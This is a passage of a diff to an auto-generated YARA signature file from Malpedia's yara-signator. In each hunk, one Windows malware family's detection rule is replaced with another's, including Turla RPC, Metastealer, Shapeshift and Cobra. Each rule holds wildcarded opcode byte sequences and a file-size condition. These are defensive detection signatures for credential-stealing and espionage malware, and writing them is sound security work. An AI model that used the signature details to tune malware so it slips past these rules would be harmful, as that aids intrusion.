+rule MALPEDIA_Win_Kagent_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5d523861-cfbe-53c5-a1e3-510491b0431d"
+		id = "eeb554cd-bcde-5191-9d05-cd5d3b643304"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mail_o"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mail_o_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kagent"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kagent_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "0523be98b7e34057335b62be8aafee77bb16a4b5cb13de84130c24ec4689c31e"
+		logic_hash = "f0789c212010e4f78374ae02f32c05cce682ad24c1e1d92ee73ca388e2879a4e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138182,32 +137838,32 @@ rule MALPEDIA_Win_Mail_O_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb09 b801000000 66894348 ba03000000 897320 488d8b70010000 e8???????? }
-		$sequence_1 = { c781e806000002000000 b801000000 4883c438 c3 c744242892070000 ba2f000000 41b96e000000 }
-		$sequence_2 = { eba9 488b5008 4c8d442440 488d0debe00e00 488b5208 e8???????? eb8e }
-		$sequence_3 = { b800010000 e8???????? 482be0 488b05???????? 4833c4 48898424d0000000 4c8ba42450010000 }
-		$sequence_4 = { e8???????? 8bf0 83f8ff 0f85befeffff 33c0 488b5c2470 488b6c2478 }
-		$sequence_5 = { 74bb 488d8b00080000 e8???????? 85c0 7457 488b9388000000 488bcb }
-		$sequence_6 = { eb04 488b45d8 8b0a 4d8bfe 8bc0 498bd5 4c8b6da8 }
-		$sequence_7 = { 85c0 0f8ec7000000 0f1f4000 488b8bf8000000 8bd5 e8???????? 488bf0 }
-		$sequence_8 = { c744242073000000 4c8d0d028e1100 8d4f06 448d420b e8???????? 33c0 488b5c2440 }
-		$sequence_9 = { eb1a 488bcb e8???????? 85c0 7560 4889b3500d0000 4889b350160000 }
+		$sequence_0 = { 83ec0c 56 57 8bf8 8b7744 8b4f18 c745f800000000 }
+		$sequence_1 = { 85c0 7e2b 3bf0 7d51 85f6 784d 8b450c }
+		$sequence_2 = { ff15???????? 57 ffd6 68???????? e8???????? 83c404 53 }
+		$sequence_3 = { 50 8d45f4 64a300000000 8a450c 8b5d10 8955ac 8b5518 }
+		$sequence_4 = { 56 8d75ec e8???????? 8b4804 8b4704 bb01000000 e8???????? }
+		$sequence_5 = { ffd6 668b542410 663b542420 74ed ff15???????? 33d2 b9e8030000 }
+		$sequence_6 = { 8b4004 33f6 83c40c 897220 897224 8b5580 52 }
+		$sequence_7 = { 56 8bf0 57 3b7508 745a 8d542410 33c9 }
+		$sequence_8 = { e8???????? c7459c09000000 895de8 8d8d6cffffff 51 57 c645fc05 }
+		$sequence_9 = { 50 68???????? 68???????? e8???????? 83c40c eb24 }
 
 	condition:
-		7 of them and filesize < 5985280
+		7 of them and filesize < 4972544
 }
-rule MALPEDIA_Win_Postnaptea_Auto : FILE
+rule MALPEDIA_Win_Turla_Rpc_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "51c689b3-106f-5456-8a81-c39f4d1222d0"
+		id = "555582c7-de4a-5625-91e9-ac0b0e0d564c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.postnaptea"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.postnaptea_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_rpc"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.turla_rpc_auto.yar#L1-L170"
 		license_url = "N/A"
-		logic_hash = "cbc31a40430b61bd28460ce500d3e6052f8e6a6f9e1d2c25674ed00c58ea2b2d"
+		logic_hash = "4906b07261ee80939dba34c531f28e5f2b514d7751640e2e81057387fedbb8f3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138221,32 +137877,38 @@ rule MALPEDIA_Win_Postnaptea_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? ffd0 448bc0 488d542430 488bb590000000 488bce e8???????? }
-		$sequence_1 = { c745c8d4f6ccf6 41bf60090000 c745cc95f695f6 c745d086f6cdf6 c745d4c6f6c7f6 660f1f840000000000 4863c2 }
-		$sequence_2 = { c785060800000af50cf5 c7850a08000012f50ef5 c7850e08000009f505f5 c7851208000003f511f5 c7851608000009f54df5 c7851a0800001af507f5 c7851e08000015f551f5 }
-		$sequence_3 = { c7459418f513f5 c7459819f51bf5 c7459c5ff5baf5 c745a0a1f50000 4533c0 418bd0 660f1f840000000000 }
-		$sequence_4 = { e8???????? 0fb64b08 0fb7430a 663b4509 7416 84c9 750c }
-		$sequence_5 = { c744247c01f516f5 c7458018f515f5 c7458453f517f5 c745881af518f5 c7458c03f51df5 c7459017f50ef5 c7459408f55cf5 }
-		$sequence_6 = { c7451830f51bf5 c7451c0bf5e8f5 c74520eef5e6f5 c74524a3f5e1f5 c74528fdf5e3f5 c7452ce4f5fdf5 c74530fdf5e3f5 }
-		$sequence_7 = { ff15???????? 85c0 7498 83f857 7493 4533c0 418bc8 }
-		$sequence_8 = { ffc3 41b401 488b0f 4885c9 7441 488b4138 4c3928 }
-		$sequence_9 = { ff15???????? 4c8bf0 4885ff 0f84a90a0000 4885c0 0f84a00a0000 c74424400af532f5 }
+		$sequence_0 = { c785080100003025213c 66c7850c0100003a3b c6850e01000055 c745c007303431 }
+		$sequence_1 = { 488bd8 ffd3 488d4d70 488bf8 ffd3 }
+		$sequence_2 = { 660f6f05???????? 66c785ec0000000255 c785a0000000193a3431 c785a4000000193c3727 c785a800000034272c02 f30f7f8568010000 c685ac00000055 }
+		$sequence_3 = { c785c400000027273a27 c785c8000000183a3130 c685cc00000055 c785c001000030362155 c745d002273c21 c745d430133c39 66c745d83055 }
+		$sequence_4 = { 66c74424543155 c744243033273030 c644243455 c744244033263030 }
+		$sequence_5 = { c745b06970746f c745b472536163 66c745b86c00 ff15???????? }
+		$sequence_6 = { c7456016273034 c745642130133c c7456839300255 c7851001000016273034 c7851401000021300527 c785180100003a363026 }
+		$sequence_7 = { f30f7f8d98010000 c785b800000027273a27 c685bc00000055 c685d801000055 }
+		$sequence_8 = { c685d801000055 f30f7f85b0010000 660f6f05???????? c7858000000012302101 c7858400000030382505 }
+		$sequence_9 = { 68???????? 6a00 6a00 ff15???????? 6a00 6aff 68d2040000 }
+		$sequence_10 = { c745f474006c00 c785c8feffff14010000 ff15???????? 85c0 750e 50 50 }
+		$sequence_11 = { 8d45bc 50 ff15???????? 85c0 0f8581000000 }
+		$sequence_12 = { 7514 8d45ac 50 ff15???????? 8bf8 85ff 0f8434010000 }
+		$sequence_13 = { 5d c3 6a00 6800000080 6a02 }
+		$sequence_14 = { e8???????? cc 56 33f6 ffb614730110 ff15???????? }
+		$sequence_15 = { 833d????????00 0f85d3240000 ba05000000 8d0d10700110 e9???????? }
 
 	condition:
-		7 of them and filesize < 2457600
+		7 of them and filesize < 311296
 }
-rule MALPEDIA_Win_Boldmove_Auto : FILE
+rule MALPEDIA_Win_Shapeshift_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3bdf90c7-36e1-5e06-8df9-776b6e88680a"
+		id = "c0c5bb16-0064-5063-a167-3feadfc849ba"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.boldmove"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.boldmove_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shapeshift"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shapeshift_auto.yar#L1-L104"
 		license_url = "N/A"
-		logic_hash = "3d258453779af88e427ea6662db58aa1b287b8846df27e0a7720298a0095c401"
+		logic_hash = "d57d4efbadfe762b0a6b1ab41967b0e572158e599e0e6d6d29d5b7411ccf5a23"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138260,32 +137922,30 @@ rule MALPEDIA_Win_Boldmove_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4308 890424 ff15???????? 50 50 8b4308 890424 }
-		$sequence_1 = { 83e104 89442454 894c2418 0f852f0e0000 }
-		$sequence_2 = { 56 53 83ec20 e8???????? a1???????? dd5df0 83780c00 }
-		$sequence_3 = { d9ee 8b5c245c 8944245c 83c701 dbe9 897c2434 }
-		$sequence_4 = { 8b449908 85c0 7415 890424 e8???????? a1???????? c744980800000000 }
-		$sequence_5 = { c7042404000000 e8???????? c7434000000000 89433c e8???????? dd5b08 0fb617 }
-		$sequence_6 = { 8d85c8fbffff c744240c07000000 89442408 c744240400040000 893424 e8???????? 8b85c8fbffff }
-		$sequence_7 = { 66250045 663d0005 0f84f3040000 6681e2ff7f }
-		$sequence_8 = { 39f0 b800000000 0f47d0 8d440b04 01d9 89442404 89542408 }
-		$sequence_9 = { d905???????? d9c1 d8c1 d9cb dbf3 dddb 0f87a7030000 }
+		$sequence_0 = { 57 8985f4feffff 33db 6a05 ff15???????? 68???????? }
+		$sequence_1 = { 8d0d009c4100 ba1d000000 e8???????? 5a c3 8d542408 }
+		$sequence_2 = { 51 ff15???????? 8bf0 89b5ecfdffff }
+		$sequence_3 = { 6af6 ff15???????? 8b04bd38054200 834c0318ff 33c0 }
+		$sequence_4 = { 8bf0 e8???????? 83c404 8bf8 33c9 66660f1f840000000000 0fbf044d3cfa4100 }
+		$sequence_5 = { f30f5e85ccfdffff f30f5905???????? e8???????? 83bde8fdffff00 741f 3bc7 }
+		$sequence_6 = { e8???????? 85f6 8bf0 6a0c 7550 e8???????? }
+		$sequence_7 = { 8995e8fdffff 57 898df8fdffff 899df0fdffff c785ecfdffff00000000 0f86ef010000 }
 
 	condition:
-		7 of them and filesize < 242688
+		7 of them and filesize < 303104
 }
-rule MALPEDIA_Win_Vskimmer_Auto : FILE
+rule MALPEDIA_Win_Metastealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d60a06ab-73b2-5007-b9fd-d7fdf53f6d46"
+		id = "d224b589-7615-5bc0-8bb6-5706cda78332"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vskimmer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vskimmer_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.metastealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.metastealer_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "fbde08601554269a17787c3ffa7dabc4bf8a82c0fe588e8a82f4a23b193dab38"
+		logic_hash = "6cb10cffce7c1599b69c9e05c260560e4bdcb2bc8aa657b55f875ee3bb8ed71d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138299,32 +137959,32 @@ rule MALPEDIA_Win_Vskimmer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0fb74624 6685c0 7413 50 ff75fc 8d8f2c020000 }
-		$sequence_1 = { 8d8dd4f7ffff e8???????? 83bdccf7ffff10 8b85b8f7ffff c645fc11 7306 }
-		$sequence_2 = { 7629 8d7e04 ff75e8 ff37 ff15???????? 85c0 }
-		$sequence_3 = { c645fc0a ff15???????? 3bc7 0f8eeb030000 bb???????? be???????? 8d85f0f7ffff }
-		$sequence_4 = { 8b8324020000 8bc8 81e101010000 83f901 0f84e1020000 }
-		$sequence_5 = { 3b8314020000 0f84cc010000 56 8bcb }
-		$sequence_6 = { e8???????? 83c418 8d85b4feffff 50 8d8d88f6ffff }
-		$sequence_7 = { 8d85ecfeffff 68???????? 50 e8???????? ffb5c4f8ffff 8d85ecfeffff }
-		$sequence_8 = { 33c0 8945f0 394510 7417 c706???????? c74610c4d54100 }
-		$sequence_9 = { 59 c3 8bff 55 8bec 51 f6430c40 }
+		$sequence_0 = { f30f59c3 f30f584104 f30f114104 0f28c1 f30f584108 f30f584918 f30f59c3 }
+		$sequence_1 = { f3a5 68???????? 66a5 c680b600000000 e8???????? 68???????? e8???????? }
+		$sequence_2 = { ffb6a8000000 8d86d8000000 50 56 e8???????? 83c410 f7d8 }
+		$sequence_3 = { f30f59cb f30f5c662c f30f101d???????? f30f5c4e28 f30f1150f8 f30f59e2 f30f59ca }
+		$sequence_4 = { ff7624 e8???????? 83c404 894654 85c0 7412 0f57c0 }
+		$sequence_5 = { f30f5dc3 f30f107804 f30f102d???????? f20f1035???????? f30f59d3 f30f59c5 f30f5ed7 }
+		$sequence_6 = { f20f101d???????? f20f1025???????? f20f102d???????? f20f1035???????? f20f103d???????? 8b5508 8b45fc }
+		$sequence_7 = { ffd0 8bd8 83c40c 807d0c00 899f88010000 895df8 c703???????? }
+		$sequence_8 = { e8???????? 6a02 8d4704 83c302 50 53 e8???????? }
+		$sequence_9 = { ffd0 83c404 85c0 7423 8b8690010000 80781100 74e8 }
 
 	condition:
-		7 of them and filesize < 376832
+		7 of them and filesize < 26230784
 }
-rule MALPEDIA_Win_Doublefantasy_Auto : FILE
+rule MALPEDIA_Win_Sync_Scheduler_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ba30a5f3-35d1-5f03-be08-9b3934519f6b"
+		id = "41472b7c-c76e-5a55-ab89-47e49be56775"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublefantasy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.doublefantasy_auto.yar#L1-L170"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sync_scheduler"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sync_scheduler_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "1a0409b74271064d42217a7a2221717756e298061c677390a0017c2a29a907a4"
+		logic_hash = "cefc3130f1fb15a7eb3be2d60b81171c09dab6a15007b67a76905b9641705749"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138338,38 +137998,32 @@ rule MALPEDIA_Win_Doublefantasy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { bfd3360000 57 6a40 8b35???????? ffd6 }
-		$sequence_1 = { 8b442404 0fb608 c1e902 8a91908c2700 8b4c2408 8811 33d2 }
-		$sequence_2 = { e8???????? 8bcb 2bc8 51 ff7514 }
-		$sequence_3 = { 50 6a00 56 8907 e8???????? 83c40c }
-		$sequence_4 = { 66ab be???????? 8dbd9ffaffff a5 }
-		$sequence_5 = { ff15???????? eb72 56 6a00 ff75e0 e8???????? ff75e4 }
-		$sequence_6 = { 83e20f c1e202 0bd6 8a92908c2700 eb02 b23d 837c241002 }
-		$sequence_7 = { ff750c ff7508 e8???????? 83c414 8945e0 }
-		$sequence_8 = { 8a80ad8c2700 eb02 32c0 84c0 }
-		$sequence_9 = { 891485a4ab2700 40 3bc1 72f1 }
-		$sequence_10 = { 8a92908c2700 885101 7e1c 0fb67002 33d2 8a5001 c1ee06 }
-		$sequence_11 = { 8a80908c2700 eb02 b03d 884103 }
-		$sequence_12 = { 33c0 85c9 7616 8da42400000000 8d50fd 891485a4ab2700 40 }
-		$sequence_13 = { b9d2360000 51 52 48 }
-		$sequence_14 = { c68094a3270000 ff35???????? ff35???????? e8???????? 83c414 e8???????? }
-		$sequence_15 = { ff37 ff750c 8b460c 03c3 50 e8???????? }
+		$sequence_0 = { b910270000 ff15???????? 90 488b55f8 4883fa10 7231 }
+		$sequence_1 = { 498bcd ff15???????? 498bcc ff15???????? e9???????? 0f57c0 }
+		$sequence_2 = { 33d2 488bc8 ff15???????? 488d0557570000 488903 48896e60 48895e08 }
+		$sequence_3 = { c6450668 c6450777 c6450855 c6450968 c6450a64 c6450b67 c6450c49 }
+		$sequence_4 = { 480f42d8 48b8ffffffffffffff7f 488d4b01 483bc8 0f87ad000000 4803c9 4881f900100000 }
+		$sequence_5 = { 75cb 32db 4883fe10 7238 488d5601 }
+		$sequence_6 = { e8???????? 488d0d9c090000 e8???????? e8???????? }
+		$sequence_7 = { c645f277 c645f377 c645f46e c645f56c c645f67d }
+		$sequence_8 = { 488905???????? c7458017000000 8b4580 3448 }
+		$sequence_9 = { c6456800 33d2 41b808010000 488d8d20020000 e8???????? 498d8680bc0000 }
 
 	condition:
-		7 of them and filesize < 172032
+		7 of them and filesize < 156672
 }
-rule MALPEDIA_Win_Asruex_Auto : FILE
+rule MALPEDIA_Win_Electricfish_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "899abd0f-c835-5f70-819c-92570cc9b462"
+		id = "4bbe8d4f-bb22-5f20-a9d1-098a3e3e3fc4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.asruex"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.asruex_auto.yar#L1-L112"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.electricfish"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.electricfish_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "a14db0e4e44f1156fe16afe843345aa29b9b1f1eb3cc060b10e0bcdf06eb97d4"
+		logic_hash = "107f1b585d0a1fb5b5a2004135458a9d2fc68da8f22b2f0a6dfa6f03b7f81b2b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138383,32 +138037,32 @@ rule MALPEDIA_Win_Asruex_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 740e 85ed 740a }
-		$sequence_1 = { e8???????? 83f8ff 7407 3d0000a000 }
-		$sequence_2 = { ff15???????? 85c0 7407 3d14270000 }
-		$sequence_3 = { 3c78 7404 3c58 7505 bb01000000 }
-		$sequence_4 = { 83f801 740e 83f803 7409 83f802 }
-		$sequence_5 = { 3c0d 7404 3c0a 7516 }
-		$sequence_6 = { 7404 3c58 7505 bb01000000 }
-		$sequence_7 = { 3c09 7408 3c0d 7404 3c0a 7516 }
-		$sequence_8 = { 7408 3c0d 7404 3c0a 7516 }
-		$sequence_9 = { 740c 3c09 7408 3c0d 7404 3c0a 7516 }
+		$sequence_0 = { eb08 56 57 53 ffd0 83c40c 3bc6 }
+		$sequence_1 = { e8???????? 8bf8 85ff 75e0 6891010000 68???????? 6a41 }
+		$sequence_2 = { eb3a 0fb67201 81e680000000 b901000000 3bc6 75c4 68ae000000 }
+		$sequence_3 = { 39442458 7413 6852020000 68???????? 50 e8???????? 83c40c }
+		$sequence_4 = { c3 837f1006 7414 689a010000 68???????? 6892000000 e9???????? }
+		$sequence_5 = { 33c0 c745fc02000000 8945e8 8945ec 8d45e8 6a08 50 }
+		$sequence_6 = { f6423401 7508 c744241401000000 8b834c010000 85c0 0f8426010000 3bf8 }
+		$sequence_7 = { 85ed 7518 6874010000 68???????? 6a41 6a7d 6a0b }
+		$sequence_8 = { e8???????? 83c40c 85c0 0f84bb040000 6a01 53 c7430c00000000 }
+		$sequence_9 = { 85ff 0f8522010000 e8???????? 5f 5e 5d }
 
 	condition:
-		7 of them and filesize < 1564672
+		7 of them and filesize < 3162112
 }
-rule MALPEDIA_Win_Vendetta_Auto : FILE
+rule MALPEDIA_Win_Nestegg_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bcdb1310-b09c-513a-b41a-f75320f7a85e"
+		id = "52ec43db-af34-5600-ae4f-7af1b99fc246"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vendetta"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vendetta_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nestegg"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nestegg_auto.yar#L1-L101"
 		license_url = "N/A"
-		logic_hash = "5c2304aa47000d3a15dbc6575084e1756c9655c08eb53d8a6e39024d5b55c108"
+		logic_hash = "998bf1c6b0e9df7e30236e71f3887671a96f6e1e7f5c7700f72ff2a5d20b9889"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138422,34 +138076,32 @@ rule MALPEDIA_Win_Vendetta_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? c745e0e8924100 e9???????? c745e0d4924100 }
-		$sequence_1 = { 8bf1 83caff bf00040000 0fb60e }
-		$sequence_2 = { 40 c745ec7c994000 894df8 8945fc 64a100000000 8945e8 }
-		$sequence_3 = { 83ef01 75d4 f7d2 5f 8bc2 5e }
-		$sequence_4 = { 53 8d85f0f7ffff 50 56 ff15???????? }
-		$sequence_5 = { 84c0 0f843b010000 8d770c 6a2c }
-		$sequence_6 = { 8b85e0feffff 03b40518ffffff 03b0acb04100 03b5f8feffff }
-		$sequence_7 = { 238df4feffff 8b85e0feffff 03b40508ffffff 03b09cb04100 8bc3 03b5dcfeffff 01b5f8feffff }
-		$sequence_8 = { 3385ecfeffff 23c2 3385f8feffff 03f0 8b85e0feffff 03b40514ffffff 03b0a8b04100 }
-		$sequence_9 = { 7f0e 7c08 81fa00000080 7704 }
+		$sequence_0 = { 8d4c2420 33ed 89442444 51 }
+		$sequence_1 = { 6a08 ff15???????? 8be8 b988000000 33c0 8dbc24a8020000 c78424a402000024020000 }
+		$sequence_2 = { 89742410 e8???????? 6a00 6800200000 8d8e2c040000 c744245800000000 }
+		$sequence_3 = { 2bc3 8bce 50 e8???????? 8b8f28040000 }
+		$sequence_4 = { 5f 5e 59 c20c00 ff15???????? }
+		$sequence_5 = { b907000000 f7f9 42 89542410 8b5500 }
+		$sequence_6 = { 7530 50 50 8b44240c 25ffff0000 50 68???????? }
+		$sequence_7 = { 81e1ffff0000 c744243400000000 d1e1 85c9 }
 
 	condition:
-		7 of them and filesize < 296960
+		7 of them and filesize < 221184
 }
-rule MALPEDIA_Win_Sidewinder_Auto : FILE
+rule MALPEDIA_Win_Cobra_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cc151d68-8079-5f48-8578-23ad18a0a4e7"
+		id = "fd128616-d78e-5906-a1c5-ca71a64ca5ee"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sidewinder_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobra"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cobra_auto.yar#L1-L492"
 		license_url = "N/A"
-		logic_hash = "e4a063cf875d6c669e0a5700a0f46ba681b39263a023b07ff990bd59cdb78477"
+		logic_hash = "e8cb467ce58a2dce4e2587c1e891472f04ba426ad5841eddc54e114fd734ddcf"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -138461,32 +138113,79 @@ rule MALPEDIA_Win_Sidewinder_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8945cc 837dcc00 0f8e37030000 0fbf4510 85c0 740e ff75c0 }
-		$sequence_1 = { dfe0 9e 740e dd45cc dc1d???????? dfe0 9e }
-		$sequence_2 = { 8d45b8 50 8d45c8 50 8d45d8 50 8d45a8 }
-		$sequence_3 = { dbe2 8945dc 837ddc00 7d17 6a3c 68???????? ff75ec }
-		$sequence_4 = { 817da0a3000000 750a 66830d????????ff eb54 837da058 740c 837da043 }
-		$sequence_5 = { 8965f8 c745fc???????? 6a02 59 e8???????? 668945e0 8b4508 }
-		$sequence_6 = { 50 6a00 e8???????? 8d45d4 50 6a00 e8???????? }
-		$sequence_7 = { 83a59cfeffff00 8b45a0 89853cffffff 8d855cffffff 50 8b853cffffff 8b00 }
-		$sequence_8 = { eb09 8d45ec 89856cffffff 8b856cffffff 8b00 8945b0 8d45d0 }
-		$sequence_9 = { e8???????? 898560ffffff eb07 83a560ffffff00 8b45c8 894588 c745b004000280 }
+		$sequence_0 = { 7511 e8???????? 85c0 7508 ff15???????? }
+		$sequence_1 = { c20c00 ff25???????? 53 56 57 8bd9 33f6 }
+		$sequence_2 = { 5e 5b c3 83fb01 7405 83fb02 7537 }
+		$sequence_3 = { 7514 391d???????? 754d 33c0 }
+		$sequence_4 = { 8b442438 85c0 757f 8b05???????? }
+		$sequence_5 = { 751c 8bcf ff15???????? 8d8fe8030000 8bf9 }
+		$sequence_6 = { ff25???????? 8b442408 85c0 750e 3905???????? 7e2c }
+		$sequence_7 = { 5b c3 85db 7405 83fb03 753b }
+		$sequence_8 = { 757f 8b05???????? 85c0 0f8e8c000000 83e801 8905???????? }
+		$sequence_9 = { e8???????? 8bf8 83fb01 751d 85ff }
+		$sequence_10 = { 5f 5e 5b c3 85ff 7418 }
+		$sequence_11 = { 33d2 b9e8030000 f7f1 83f805 }
+		$sequence_12 = { 813c0850450000 7503 33c0 c3 }
+		$sequence_13 = { e8???????? ff463c 57 e8???????? }
+		$sequence_14 = { ff15???????? 53 ff7714 8bf0 ff571c 59 }
+		$sequence_15 = { 7407 33c0 e9???????? ff15???????? e9???????? }
+		$sequence_16 = { 8b742408 837e0c00 7507 b865005921 5e c3 837e2800 }
+		$sequence_17 = { 7f07 e8???????? eb26 83c0ff }
+		$sequence_18 = { e8???????? 33db 3bc3 741a }
+		$sequence_19 = { e8???????? eb6d e8???????? 85c0 7564 }
+		$sequence_20 = { ebe4 4533f6 413bee 75f4 }
+		$sequence_21 = { 7564 488b0b 488b01 83385c 7e4b 4c8b505c }
+		$sequence_22 = { e8???????? 498bce 85c0 750e }
+		$sequence_23 = { 7548 488b05???????? 4885c0 743c 488b8c24a0000000 }
+		$sequence_24 = { e8???????? 498bce e8???????? 48832700 }
+		$sequence_25 = { 7504 33c0 eb05 b865005921 }
+		$sequence_26 = { 83781400 750a b865005921 e9???????? }
+		$sequence_27 = { 663bcb 75f4 8b15???????? 8b0d???????? 8910 8b15???????? }
+		$sequence_28 = { ff15???????? 83f87a 740b 3d230000c0 }
+		$sequence_29 = { 51 e8???????? 33c0 83c43c }
+		$sequence_30 = { 6689440ffc 6685c0 75ee f685c003000010 }
+		$sequence_31 = { ff15???????? eb03 8b7d0c 3bfb }
+		$sequence_32 = { 51 6a00 6a00 56 ff15???????? 56 }
+		$sequence_33 = { 6a03 68000000c0 50 ff15???????? 8bf0 83feff 7505 }
+		$sequence_34 = { 83feff 7505 33c0 5e 5d c3 8b4d08 }
+		$sequence_35 = { 50 6a00 6aff e8???????? 85c0 7405 }
+		$sequence_36 = { 8bec 56 6a00 6880000000 6a03 6a00 6a03 }
+		$sequence_37 = { 5d c3 8b4d08 57 51 6a00 }
+		$sequence_38 = { b914000000 84c0 0f45f9 488bce 8bd7 ff15???????? 85c0 }
+		$sequence_39 = { 4584ff 7518 33c0 4881c4480d0000 }
+		$sequence_40 = { 8d8588feffff 68???????? 50 ff15???????? 83c42c }
+		$sequence_41 = { 4533e4 4c8bf1 488bda 488d8d10060000 33d2 41b808020000 4489a5800c0000 }
+		$sequence_42 = { 4c89642448 488d4c2468 48894c2440 4c89642438 }
+		$sequence_43 = { 33d2 488bc8 ff15???????? 488bcf ff15???????? 41b701 }
+		$sequence_44 = { 56 4154 4156 4157 488dac24b8f3ffff }
+		$sequence_45 = { 7507 32c0 e9???????? c745b818000000 }
+		$sequence_46 = { 668b08 83c002 6685c9 75f5 2bc2 d1f8 66837c43fe5c }
+		$sequence_47 = { 33f6 03c2 13ce 51 50 }
+		$sequence_48 = { 0f8456feffff 807c241301 6800080000 0f8544020000 }
+		$sequence_49 = { 05a1000000 50 8d84249c0d0000 68???????? }
+		$sequence_50 = { 05a2000000 50 8d8c249c0d0000 68???????? }
+		$sequence_51 = { 0f84100f0000 6800080000 57 56 }
